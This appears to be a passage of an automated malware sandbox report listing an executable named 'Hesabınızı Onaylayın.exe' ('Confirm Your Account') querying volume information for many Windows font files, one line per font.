          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
